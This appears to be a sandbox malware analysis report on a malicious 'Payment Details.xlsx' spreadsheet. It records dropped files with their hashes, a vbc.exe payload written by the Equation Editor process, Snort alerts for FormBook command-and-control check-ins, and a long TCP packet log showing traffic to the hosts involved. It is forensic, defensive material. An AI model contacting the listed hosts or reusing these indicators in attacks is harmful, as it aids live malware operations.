                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    C:\Users\user\Desktop\~$Payment Details.xlsx
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                    Malicious:true
                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    C:\Users\Public\vbc.exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%

                                    Static File Info

                                    General

                                    File type: CDFV2 Encrypted
                                    Entropy (8bit): 7.971193076260305
                                    TrID:
                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                    File name: Payment Details.xlsx
                                    File size: 234600
                                    MD5: f49e322b837835ac60cad8c173ecff31
                                    SHA1: c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
                                    SHA256: ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
                                    SHA512: c5ce7feb4a44d0a3c0ba17c1104d599409c66c1a36e68f382df9048e18f02349c16cf4de21437f988e4779ce56847b9574dd83562dd1239bc88358922e2826b9
                                    SSDEEP: 6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash: e4e2aa8aa4b4bcb4

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp                | Protocol | SID     | Message                              | Source Port | Dest Port | Source IP    | Dest IP
                                    11/25/21-19:30:53.961180 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49167       | 80        | 192.168.2.22 | 52.128.23.153
                                    11/25/21-19:30:53.961180 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49167       | 80        | 192.168.2.22 | 52.128.23.153
                                    11/25/21-19:30:53.961180 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49167       | 80        | 192.168.2.22 | 52.128.23.153

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Nov 25, 2021 19:29:22.616595030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616614103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616631031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616652012 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616657972 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616668940 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616672993 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616693020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616709948 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616714001 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616734028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616748095 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616753101 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616755962 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616769075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616775036 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616779089 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616800070 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616802931 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616827011 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616844893 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.618696928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.838660955 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838701010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838718891 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838741064 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838762999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838784933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838809013 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838834047 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838954926 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839570999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839601040 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839626074 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839627981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839651108 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839662075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839678049 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839694023 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839704037 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839726925 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839745998 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839752913 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839782953 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839817047 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.840662956 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.840689898 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.840715885 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.840739965 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.840768099 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.840795994 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.840805054 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841615915 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841643095 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841667891 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841692924 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841718912 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841737032 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841747046 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841763973 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841772079 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841773033 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841798067 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.841831923 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841842890 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.841857910 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.842328072 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844537020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844568014 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844594002 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844619989 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844645023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844670057 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844686031 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844698906 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844702959 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844727993 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844733000 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844753027 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844758987 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844779968 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844784975 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844805956 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844810009 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844830990 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844831944 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844873905 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844890118 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844898939 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844899893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844923973 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844926119 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844953060 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844954014 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844970942 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.844979048 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.844999075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845005035 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845021009 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845027924 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845045090 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845052004 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845077991 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845092058 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845103025 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845105886 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845117092 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845127106 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845153093 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845160007 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845175028 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845176935 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845201015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845223904 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845225096 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845240116 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845247984 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845247030 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845267057 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845272064 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845292091 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845295906 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845319986 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845319986 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845343113 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845345020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845366001 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845370054 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845396042 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845397949 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845412016 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845418930 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845442057 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845443964 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845464945 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845468044 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845493078 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845493078 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845515966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845520973 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845541000 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.845541954 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845570087 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.845591068 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.846302032 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851110935 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851145983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851174116 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851200104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851219893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851244926 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851243019 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851272106 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851275921 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851291895 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851298094 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851325035 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851349115 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851350069 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851366997 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851375103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851399899 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851399899 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851423979 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851424932 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851445913 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851448059 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851471901 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851474047 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851500034 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851500988 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851525068 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851526976 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851550102 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851556063 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851576090 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851589918 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851598024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851612091 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851620913 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851633072 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851645947 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851658106 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851670980 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851686954 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851694107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851692915 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851715088 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851722956 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851737022 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851744890 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851761103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851769924 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851784945 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.851794004 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851814032 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.851839066 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.852531910 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.853436947 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.073645115 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073678017 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073690891 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073703051 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073715925 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073728085 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073744059 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073755980 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073767900 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073842049 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073858976 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073873043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073884010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073899031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073915005 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073929071 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073945045 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073960066 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.073964119 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073982000 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.073997974 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.073998928 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074012995 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074032068 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074042082 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.074048996 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074064970 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074081898 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074084997 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.074095011 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074106932 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074120045 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074131966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074134111 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.074145079 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074162960 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.074184895 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.074229002 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075054884 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075077057 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075090885 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075104952 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075123072 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075139999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075155973 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075155020 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075170040 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075191021 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075231075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075666904 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075685024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075696945 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075707912 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075732946 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075743914 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075751066 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075767994 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075784922 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075786114 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075803041 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075819016 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075833082 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.075836897 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075853109 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075870037 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.075880051 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309926987 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309931040 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309950113 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309953928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309973001 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309979916 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309993982 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310003042 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310015917 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310022116 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310039043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310045004 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310060024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310070038 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310081959 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310087919 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310103893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310112953 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310126066 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310133934 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310157061 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310164928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310178995 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310189009 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310200930 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310213089 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310223103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310235023 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310244083 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310246944 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310272932 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310297012 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:24.526784897 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:30:53.633594036 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:53.789338112 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:53.789490938 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:53.961179972 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.116238117 CET804916752.128.23.153192.168.2.22
